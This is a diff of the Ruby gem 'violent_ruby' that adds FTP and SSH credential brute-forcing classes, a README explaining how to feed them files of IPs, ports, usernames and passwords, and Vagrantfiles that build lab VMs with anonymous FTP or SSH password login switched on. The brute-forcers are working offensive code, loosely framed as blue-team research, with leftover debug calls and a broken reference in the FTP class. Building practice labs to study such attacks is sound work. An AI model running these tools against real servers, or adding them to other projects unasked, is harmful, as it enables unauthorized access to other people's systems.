violent_ruby 1.0.0

data/lib/violent_ruby/ftp_brute_forcer/Vagrantfile

@@ -0,0 +1,30 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+# Vulnerable FTP Server in'a Can ( well, a VM ).
+Vagrant.configure("2") do |config|
+  # For a complete reference, please see the online documentation at
+  # https://docs.vagrantup.com.
+
+  config.vm.box = "debian/jessie64"
+  config.vm.network "forwarded_port", guest: 21, host:2121 
+  config.vm.network "private_network", ip: "192.168.33.10"
+  config.vm.synced_folder ".", "/vagrant", disabled: true
+  
+  # Enable provisioning with a shell script.
+  config.vm.provision "shell", inline: <<-SHELL
+    sudo su root
+    apt-get update
+    apt-get install vsftpd -y
+    # for fun
+    sed -i -e 's/anonymous_enable=NO/anonymous_enable=YES/g' /etc/vsftpd.conf
+    service vsftpd restart
+  SHELL
+end
+
+# Basic Gist of the Picture
+# vagrant up
+# vagrant ssh
+# ftp localhost
+# user: vagrant
+# password: vagrant

data/lib/violent_ruby/ftp_brute_forcer/ftp_brute_forcer.rb

@@ -0,0 +1,143 @@
+require 'net/ftp'
+
+module ViolentRuby
+  # The Ftp Brute Forcer class provides a simply way to 
+  # brute-force an FTP server's credentials. 
+  # @author Kent 'picat' Gruber
+  #
+  # @example Basic Usage
+  #   ftp = FtpBruteForcer.new
+  #   ftp.users     = "resources/ftp_users.txt"
+  #   ftp.passwords = "resources/ftp_passwords.txt"
+  #   ftp.ips       = "resources/ftp_ips.txt"
+  #   ftp.ports     = "resources/ftp_ports.txt"
+  #   # brue'm!
+  #   ftp.brute_force!
+  #   # => results
+  #
+  class FtpBruteForcer 
+    attr_accessor :users
+    attr_accessor :passwords
+    attr_accessor :ips
+    attr_accessor :ports
+
+    # Create a new Ftp Brute Forcer.
+    #
+    # @param [Hash] args The options to create a new Ftp Brute Forcer.
+    # @param args [String] :users The path to a file of users to attempt.
+    # @param args [String] :passwords The path to a file of passwords to attempt.
+    # @param args [String] :ips The path to a file of server ips to attempt to connect to.
+    # @param args [String] :ports The path to a file of service ports to attempt to connect to.
+    def initialize(args = {})
+      @users     = args[:users]     if args[:users]     && File.readable?(args[:users]) 
+      @passwords = args[:passwords] if args[:passwords] && File.readable?(args[:passwords])
+      @ips       = args[:ips]       if args[:ips]       && File.readable?(args[:ips])
+      @ports     = args[:ports]     if args[:ports]     && File.readable?(args[:ports])
+      @ftp       = Net::FTP.new
+    end
+
+    # Brute force some'a dem FTP login credz.
+    #
+    # @param [Hash] args The options to brute force. 
+    # @param args [String] :users The path to a file of users to attempt.
+    # @param args [String] :passwords The path to a file of passwords to attempt.
+    # @param args [String] :ips The path to a file of server ips to attempt to connect to.
+    # @param args [String] :ports The path to a file of service ports to attempt to connect to.
+    def brute_force(args = {})
+      meets_our_requirements?(args) 
+      results   = []
+      ips       = args[:ips]        || @ips 
+      ports     = args[:ports]      || @ports
+      users     = args[:users]      || @users
+      passwords = args[:passwords]  || @passwords
+      iterate_over(ips).each do |ip|
+        iterate_over(ports).each do |port|
+          next unless connectable?(ip: ip, port: port)
+          binding.pry
+          iterate_over(users).each do |user|
+            iterate_over(passwords).each do |password|
+              if able_to_login?(ip: ip, port: port, username: user, password: password)
+                puts "yup"
+                results << format_result("SUCCESS", ip, port, user, password)
+              else
+                puts "nope"
+                results << format_result("FAILURE", ip, port, user, password)
+              end
+            end
+          end
+        end
+      end
+      results
+    end
+
+    def connectable?(args = {})
+      @ftp.connect(args[:ip], args[:port])
+      return true if @ftp.last_response_code == "220"
+      false
+    rescue
+      false
+    end
+
+    def able_to_login?(args = {})
+      #@ftp_login ||= Net::FTP.new
+      @ftp.connect(args[:ip], args[:port])
+      @ftp.login(args[:username], args[:password]) 
+      if @ftp.welcome == "230 Login successful.\n"
+        @ftp.close
+        return true
+      end
+      ftp_login.quit
+      false
+    rescue
+      false
+    end
+
+    alias brute_force! brute_force
+
+    private
+
+    def format_result(type, ip, port, user, password)
+      { time: Time.now, type: type, ip: ip, port: port, user: user, password: password }
+    end
+
+
+    def iterate_over(file)
+      File.foreach(file).map(&:strip)
+    end
+
+    def meets_our_requirements?(args = {})
+      raise "No ip addresses to connect to." unless ips?(args)
+      raise "No ports to connect to." unless ports?(args)
+      raise "No passwords to try." unless passwords?(args)
+      raise "No users to try." unless users?(args)
+      true
+    end
+
+    def ips?(args = {})
+      return true if args[:ips]
+      return true if @ips
+      false 
+    end
+
+    def passwords?(args = {})
+      return true if args[:passwords]
+      return true if @passwords
+      false
+    end
+
+    def ports?(args = {})
+      return true if args[:ports]
+      return true if @ports
+      false
+    end
+
+    def users?(args = {})
+      return true if args[:users]
+      return true if @users
+      false
+    end
+
+
+
+  end
+end

data/lib/violent_ruby/ssh_brute_forcer/README.md

@@ -0,0 +1,131 @@
+# SSH Brute Forcer 
+
+Using brute-force, you can easily try to force your way into a server over SSH.
+
+## Vagrantfile
+
+In this directory, along with the ruby code and the README.md, you'll find a `Vagrantfile` which you can use to setup a VM to test out the SSH Brute Forcer. This requires you to have [vagrant](https://www.vagrantup.com/) installed.
+
+#### Start VM
+
+```shell
+$ pwd 
+/somewhere/violent_ruby/lib/violent_ruby/ssh_brute_forcer
+$ ls
+README.md           Vagrantfile         ssh_brute_forcer.rb
+$ vagrant up
+Bringing machine 'default' up with 'virtualbox' provider...
+==> default: Importing base box 'debian/jessie64'...
+==> ect...
+```
+
+#### SSH into VM
+
+Very simply `vagrant ssh` will allow you to SSH into the VM to make changes or monitor the VM while brute-forcing it for blue team research.
+
+```shell
+$ vagrant ssh
+
+The programs included with the Debian GNU/Linux system are free software;
+the exact distribution terms for each program are described in the
+individual files in /usr/share/doc/*/copyright.
+
+Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
+permitted by applicable law.
+vagrant@jessie:~$ 
+```
+
+The VM should be provisioned with ssh, and it should be running with anonymous access turned on. Because that's fun.
+
+#### Stop VM
+
+If you've logged into the VM via ssh, logout and then use `vagrant destroy` to destroy the VM.
+
+```shell
+$ vagrant destroy
+    default: Are you sure you want to destroy the 'default' VM? [y/N] y
+==> default: Forcing shutdown of VM...
+==> default: Destroying VM and associated drives...
+```
+
+## Initialization
+
+```ruby
+require 'violent_ruby'
+
+ssh = SSHBruteForcer.new
+```
+
+## Providing Required Files
+
+```ruby
+require 'violent_ruby'
+
+ssh = SSHBruteForcer.new
+
+ssh.users     = "resources/ssh_users.txt"
+ssh.ports     = "resources/ssh_ports.txt"
+ssh.ips       = "resources/ssh_ips.txt"
+ssh.passwords = "resources/ssh_passwords.txt"
+```
+
+#### Users
+
+A `.users` file should contain a list of ssh usernames to use.
+
+```
+vagrant
+root
+admin
+picat
+```
+
+#### Passwords
+
+A `.passwords` file should contain a list of ssh passwords to use.
+
+```
+vagrant
+root
+toor
+picat
+```
+
+#### IPs
+
+A `.ips` file should contain a list of ip addresses to attempt connections on.
+
+```
+192.168.33.9
+192.168.33.10
+192.168.33.111
+```
+
+#### Ports
+
+A `.ports` file should contain a list of ports to attempt connections on.
+
+```
+22
+2222
+```
+## Brute Force'n
+
+Once everything has been setup, we're going to be able to try start brute forcing!
+
+```ruby
+require 'violent_ruby'
+
+ssh = SSHBruteForcer.new
+
+ssh.users     = "resources/ssh_users.txt"
+ssh.ports     = "resources/ssh_ports.txt"
+ssh.ips       = "resources/ssh_ips.txt"
+ssh.passwords = "resources/ssh_passwords.txt"
+
+# Iterate through results.
+ssh.brute_force do |result|
+  result
+  # => [{:time=>2017-04-03 19:02:11 -0400, :type=>"SUCCESS", :ip=>"192.168.33.10", :port=>"22", :user=>"vagrant", :password=>"vagrant"},
+end
+```

data/lib/violent_ruby/ssh_brute_forcer/Vagrantfile

@@ -0,0 +1,20 @@
+# -*- mode: ruby -*-
+# vi: set ft=ruby :
+
+# Vulnerable SSH Server in'a Can ( well, a VM ).
+Vagrant.configure("2") do |config|
+  # For a complete reference, please see the online documentation at
+  # https://docs.vagrantup.com.
+
+  config.vm.box = "debian/jessie64"
+  config.vm.network "private_network", ip: "192.168.33.10"
+  config.vm.synced_folder ".", "/vagrant", disabled: true
+  
+  # Enable provisioning with a shell script.
+  config.vm.provision "shell", inline: <<-SHELL
+    sudo su root
+    # for fun
+    sed -i -e 's/#PasswordAuthentication yes/PasswordAuthentication yes/g' /etc/ssh/sshd_config
+    service sshd restart
+  SHELL
+end

data/lib/violent_ruby/ssh_brute_forcer/ssh_brute_forcer.rb

@@ -0,0 +1,206 @@
+require 'net/ssh'
+require 'socketry'
+require 'timeout'
+
+module ViolentRuby
+  # The SSH Brute Forcer class provides a simply way to 
+  # brute-force an SSH server's credentials. 
+  # @author Kent 'picat' Gruber
+  #
+  # @example Basic Usage
+  #   ssh = SSHBruteForcer.new
+  #   ssh.users     = "resources/ssh_users.txt"
+  #   ssh.passwords = "resources/ssh_passwords.txt"
+  #   ssh.ips       = "resources/ssh_ips.txt"
+  #   ssh.ports     = "resources/ssh_ports.txt"
+  #   # brue'm!
+  #   ftp.brute_force!
+  #   # => results
+  #
+  class SSHBruteForcer 
+    # @attr [String] users Path to file containing users.
+    attr_accessor :users
+    # @attr [String] passwords Path to file containing passwords.
+    attr_accessor :passwords
+    # @attr [String] ips Path to file containing ip addresses.
+    attr_accessor :ips
+    # @attr [String] ips Path to file containing ports.
+    attr_accessor :ports
+
+    # Create a new SSH Brute Forcer.
+    #
+    # @param [Hash] args The options to create a new SSH Brute Forcer.
+    # @param args [String] :users The path to a file of users to attempt.
+    # @param args [String] :passwords The path to a file of passwords to attempt.
+    # @param args [String] :ips The path to a file of server ips to attempt to connect to.
+    # @param args [String] :ports The path to a file of service ports to attempt to connect to.
+    def initialize(args = {})
+      @users     = args[:users]     if args[:users]     && File.readable?(args[:users]) 
+      @passwords = args[:passwords] if args[:passwords] && File.readable?(args[:passwords])
+      @ips       = args[:ips]       if args[:ips]       && File.readable?(args[:ips])
+      @ports     = args[:ports]     if args[:ports]     && File.readable?(args[:ports])
+    end
+
+    # Brute force some'a dem SSH login credz.
+    #
+    # @param [Hash] args The options to brute force. 
+    # @param args [String] :users The path to a file of users to attempt.
+    # @param args [String] :passwords The path to a file of passwords to attempt.
+    # @param args [String] :ips The path to a file of server ips to attempt to connect to.
+    # @param args [String] :ports The path to a file of service ports to attempt to connect to.
+    # @return [Array<Hash>]
+    def brute_force(args = {})
+      meets_our_requirements?(args) 
+      results   = []
+      ips       = args[:ips]        || @ips 
+      ports     = args[:ports]      || @ports
+      users     = args[:users]      || @users
+      passwords = args[:passwords]  || @passwords
+      iterate_over(ips).each do |ip|
+        iterate_over(ports).each do |port|
+          binding.pry
+          next unless connectable?(ip: ip, port: port)
+          iterate_over(users).each do |user|
+            iterate_over(passwords).each do |password|
+              if able_to_login?(ip: ip, port: port, username: user, password: password)
+                result = format_result("SUCCESS", ip, port, user, password)
+              else
+                result = format_result("FAILURE", ip, port, user, password)
+              end
+              results << result
+              yield result if block_given?
+            end
+          end
+        end
+      end
+      results
+    end
+
+    # brute_force! is the same as brute_force
+    alias brute_force! brute_force
+
+    # Check if a given IP address and port can connceted to.
+    # @see #brute_force
+    # @param [Hash] args the options to brute force. 
+    # @param args [String] :ip The ip address to attempt to connect to.
+    # @param args [String] :port The port to attempt to connect to.
+    # @return [Boolean]
+    def connectable?(args = {})
+      Timeout::timeout(2) do
+        Socketry::TCP::Socket.connect(args[:ip], args[:port])
+        return true
+      end
+    rescue
+      false
+    end
+
+    # Check if a given IP address, port, username and passwords 
+    # are correct to login.
+    # @see #brute_force
+    # @param [Hash] args 
+    # @param args [String] :ip 
+    # @param args [String] :port 
+    # @param args [String] :username
+    # @param args [String] :password
+    # @return [Boolean]
+    def able_to_login?(args = {})
+      Net::SSH.start(args[:ip], 
+                     args[:username],
+                     port: args[:port].to_i,
+                     password: args[:password],
+                     auth_methods: ['password'],
+                     number_of_password_prompts: 0)
+      true
+    rescue
+      false
+    end
+
+    private
+
+    # @api private
+    # Format the results from brute force attempts.
+    # @see #brute_force
+    # @param [String] type 
+    # @param [String] ip
+    # @param [Integer] port
+    # @param [String] user 
+    # @param [String] password 
+    # @return [Hash]
+    def format_result(type, ip, port, user, password)
+      { time: Time.now, type: type, ip: ip, port: port, user: user, password: password }
+    end
+
+    # @api private
+    # Iterate over each line in a file, stripping each line as it goes.
+    # @see File
+    # @param [String] file 
+    # @return [Enumerator]
+    def iterate_over(file)
+      File.foreach(file).map(&:strip)
+    end
+
+    # @api private
+    # Check if the given arguments contain an ip, port, password and user files.
+    # @see #brute_force
+    # @param [Hash] args the options to brute force. 
+    # @param args [String] :ips
+    # @param args [String] :ports
+    # @param args [String] :passwords
+    # @param args [String] :users
+    # @return [Boolean]
+    def meets_our_requirements?(args = {})
+      raise "No ip addresses to connect to." unless ips?(args)
+      raise "No ports to connect to."        unless ports?(args)
+      raise "No passwords to try."           unless passwords?(args)
+      raise "No users to try."               unless users?(args)
+      true
+    end
+
+    # @api private
+    # Check if the given arguments contains ips, or has been set.
+    # @see #meets_our_requirements?
+    # @param [Hash] args the options to brute force. 
+    # @param args [String] :ips
+    # @return [Boolean]
+    def ips?(args = {})
+      return true if args[:ips] || @ips
+      false 
+    end
+
+    # @api private
+    # Check if the given arguments contains passwords, or has been set.
+    # @see #meets_our_requirements?
+    # @param [Hash] args 
+    # @param args [String] :passwords
+    # @return [Boolean]
+    def passwords?(args = {})
+      return true if args[:passwords] || @passwords
+      false
+    end
+
+    # @api private
+    # Check if the given arguments contains ports, or has been set.
+    # @see #meets_our_requirements?
+    # @param [Hash] args 
+    # @param args [String] :ports
+    # @return [Boolean]
+    def ports?(args = {})
+      return true if args[:ports] || @ports
+      false
+    end
+
+    # @api private
+    # Check if the given arguments contains users, or has been set.
+    # @see #meets_our_requirements?
+    # @param [Hash] args 
+    # @param args [String] :users
+    # @return [Boolean]
+    def users?(args = {})
+      return true if args[:users] || @users
+      false
+    end
+
+
+
+  end
+end